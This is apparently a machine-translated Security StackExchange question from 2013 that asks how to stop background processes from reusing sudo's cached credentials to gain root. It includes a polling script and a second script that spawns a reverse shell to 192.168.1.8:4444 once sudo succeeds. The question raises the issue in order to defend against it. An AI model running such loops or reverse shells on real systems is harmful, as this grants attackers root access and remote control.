最近,我在or上注意到,运行sudo不仅允许在同一个窗口甚至同一个应用程序中再次运行它,而且允许任何应用程序以root用户的身份运行shell命令。这意味着任何试图在循环中不使用密码运行sudo的应用程序都将获得根用户权限。有办法改变这种状况吗?
示例shell脚本:
while (true) do
if [ `echo ""|sudo -S whoami` = "root" ]; then
say root
echo root
exit
fi
done如果在后台运行,然后运行sudo命令,它会说root,然后退出。我更关注的另一个例子是:
while (true) do
if [ `echo ""|sudo -S whoami` = "root" ]; then
bash -i > /dev/tcp/192.168.1.8/4444 0>&1
fi
done发布于 2013-12-22 03:30:34
https://security.stackexchange.com/questions/47476
复制相似问题